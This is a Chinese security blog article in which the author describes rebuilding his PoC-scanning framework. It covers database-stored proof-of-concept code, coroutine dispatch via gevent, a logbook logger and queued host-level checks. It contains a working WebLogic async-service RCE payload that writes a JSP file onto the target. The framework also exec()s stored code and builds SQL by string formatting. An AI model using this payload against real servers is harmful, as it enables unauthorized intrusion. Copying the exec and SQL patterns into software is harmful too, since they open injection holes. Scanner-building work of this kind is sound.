距离笔者在gayhub发布“AngelSword”这款工具已有两年时间,这期间来有不少人star和fork,同时也有很多人发私信提供建议,也是在最近半年多这个项目已经不再维护,因为时间原因不再继续添加poc,最主要原因是觉得这个项目写的并不美观且功能不够强大,所以才有了这篇文章。
有了推翻了重来的想法,接着就构思这个框架到底是怎样的:
1.poc代码不存文件,用到的时候直接检测出结果。
2.只要给出关键字,自动化搜索相关的poc轮询调用。
3.web层漏洞和主机层漏洞检测分离。
按照这些思路开始怼代码,先定义数据结构:建立webexploit数据表内容如下,vulname设置为主键,poc列中存储检测代码。
demo poc代码如下:
def _verify(url, cookies, uagent, vulns, proxy):
pocdict = {
"vulnname":"weblogic_wls_async_rce",
"isvul": False,
"vulnurl":"",
"payload":"",
"proof":"",
"response":"",
"exception":"",
}
headers = {
"User-Agent" : uagent,
"Content-Type": 'text/xml',
}
time_stamp = time.mktime(datetime.datetime.now().timetuple())
m = hashlib.md5(str(time_stamp).encode(encoding='utf-8'))
md5_str = m.hexdigest()
payload = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.8.0_131" class="java.beans.xmlDecoder"><object class="java.io.PrintWriter"><string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/{0}.jsp</string><void method="println"><string><![CDATA[56540676a129760a3]]></string></void><void method="close"/></object></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>'.format(md5_str)
try:
vurl = urllib.parse.urljoin(url, '_async/AsyncResponseService')
req = requests.post(vurl, data=payload, cookies=cookies, headers=headers, timeout=15, verify=False, proxies=proxy)
time.sleep(5)
rurl = urllib.parse.urljoin(url, 'bea_wls_internal/{0}.jsp'.format(md5_str))
reqr = requests.get(rurl, timeout=10, verify=False)
if r"56540676a129760a3" in reqr.text:
pocdict['isvul'] = True
pocdict['vulnurl'] = vurl
pocdict['payload'] = payload
pocdict['proof'] = rurl
pocdict['response'] = reqr.text
except Exception as e:
pocdict['exception'] = str(e)
vulns.append(pocdict)
_verify(self.url, self.cookies, findProxy().randomUA(), self.vulns, self.proxynode)
poc代码存入数据库,每个poc都只有一个_verify函数,接受的参数来源于pocfactory类自身变量(后面说),程序执行完把结果存到字典最后再把字典放入列表,列表的功能当然就是为了遍历(配合协程并发)。
poc调度主要有以下几种,如图所示:
1)单一poc->单一目标
2)单一poc->多个目标
3)多个poc->单一目标
4)多个poc->多个目标
为了增加速度,往往会使用threading库或者gevent库,这里首选gevent,之前测试过在高并发的情况下协程要比多线程的效率高一些。
接着编写pocfactory类,定义一些初始化变量,可以从外部动态设置参数(例如cookies或者自定义线程数),loadmodule函数的功能是把所有poc需要用到的导入模块一次性导入,这样后续每次执行poc就不需要为缺少模块而发愁了。
然后就是编写执行poc模块的函数runpocwithcmsname,这个函数接受一个keyword参数,然后从数据库中把所有匹配到keyword的poc代码全部拉出存储到poclist列表,最后再用协程并发执行pocexec函数,执行之后的结果都在self.vulns列表里,依次插入数据库。
到这里只有几十行代码就可以把搜索出来的poc一次性调度完,这样就完成了单一poc->单一目标和多个poc->单一目标。如果有不明白pocexec这个函数的作用可以参考我之前写过的一篇文章:pocsuite框架代码解析。而要增加多目标就比较容易了,这里我测试了两种方法:多进程+协程,协程+协程,最后得出的结果是在时间开销上只用协程要比多进程+协程还要高效,然后就有了下面的代码。
为了能够清晰的显示执行poc的结果详细情况,我又用logbook模块写了一个日志类:
class mylog:
def __init__(self, logname, toscreen=False):
# 设置日志名称
self.logname = logname
self.toscreen = toscreen
# 设置日志目录
self.LOG_DIR = self.setpath()
# 设置本地时间
logbook.set_datetime_format("local")
# 设置终端输出格式
self.log_standard = ColorizedStderrHandler(bubble=True)
self.log_standard.formatter = self.logformat
# 设置文件输出格式
self.log_file = TimedRotatingFileHandler(
os.path.join(self.LOG_DIR, '{}.log'.format(self.logname)), date_format='%Y-%m-%d', bubble=True, encoding='utf-8')
self.log_file.formatter = self.logformat
# 执行log记录
self.log = Logger("SatanLogging")
self.logrun()
""" 日志存储函数 """
def setpath(self):
logpath = os.path.join(GlobalConf().progpath['location'], 'Backtracking/log')
if not os.path.exists(logpath):
os.makedirs(logpath)
return logpath
""" 格式化日志函数 """
def logformat(self, record, handler):
log = "[{date}] [{level}] [{filename}] [{func_name}] [{lineno}] {msg}".format(
# 日志时间
date=record.time,
# 日志等级
level=record.level_name,
# 文件名
filename=os.path.split(record.filename)[-1],
# 函数名
func_name=record.func_name,
# 行号
lineno=record.lineno,
# 日志内容
msg=record.message
)
return log
""" 生成日志函数 """
def logrun(self):
self.log.handlers = []
self.log.handlers.append(self.log_file)
# 如果为True将日志打到屏幕 if self.toscreen:
self.log.handlers.append(self.log_standard)
这样基本骨架算是写完了,然后测试一下效果,目标是笔者跟朋友借的一台存在漏洞的weblogic。
在数据库中查看检测结果。
在log文件中查看检测结果,其实跟数据库中的结果大致差不多,只是response内容写进了日志而没有写进数据库。
目前针对web漏洞的poc框架的雏形已经完全写完了,核心代码只有50多行,而针对主机层的漏洞poc也采用相同的调用结构,只不过一次性导入模块可能略有区别。
还有个区别就是如果一次性发送大量请求给web服务器,每个请求都相对独立,可以说是请求的结果都相对符合预期。但是如果是主机层面的,可能一个完整的检测过程是通过好几次发包来获取结果,如果高并发的情况下会破坏socket包请求序列,这就导致有些存在漏洞的目标但是你的poc并没有检测出漏洞。所以针对主机层漏洞采用的是队列的方式,设置阻塞,当多个poc攻击一个目标的时候,让每个poc都呈现“排队”模式。
def Consumer(self, pocstr):
while not self.queue.empty():
data = self.queue.get()
sem.acquire()
exec(data)
gevent.sleep(0)
sem.release()
def runpocwithsysname(self, keyword):
try:
poclist = list()
self.loadmodule()
sql = 'SELECT poc from hostexploit WHERE vulname like "%{}%"'.format(keyword)
res = db().execute(sql)
for item in res:
poclist.append(item['poc'])
self.queue.put_nowait(item['poc'])
mylog('hostexploit', True).log.info(pyfancy().green('[+]针对目标:{0}:{1} 加载{2} hostpoc {3}个'.format(self.host, self.port, keyword, len(poclist))))
threads = [gevent.spawn(self.Consumer, item) for item in poclist]
gevent.joinall(threads)
虽然用队列把多个poc对单一目标的检测给阻塞了,时间开销变大了,但是单一poc对多个目标或多个poc对多个目标发起的请求还是高并发的。
总而言之以上这些只是一个比较完整的架子,至于最基本的还是poc的累积,而自定义的poc模板也尽量是代码能少则少,只要一个函数就可以把漏洞检测出来。当然你也可以在_verify函数里写复杂的类或者函数,实践证明也是没问题的。 对于需要引入外部平台检测的,额外写个GlobalConf类,里面定义好接口地址,这些只要进入交互式终端自动加载进去就OK了。
虽然笔者起的名字叫100行。。。。这里的100行代码只是指核心代码,而加上数据库管理的,poc代码的和各种巴拉巴拉设置的恐怕也要超过几千行了,核心代码笔者已经上传到gayhub,可供大家参考拍砖。
*本文原创作者:六翼,本文属于FreeBuf原创奖励计划,未经许可禁止转载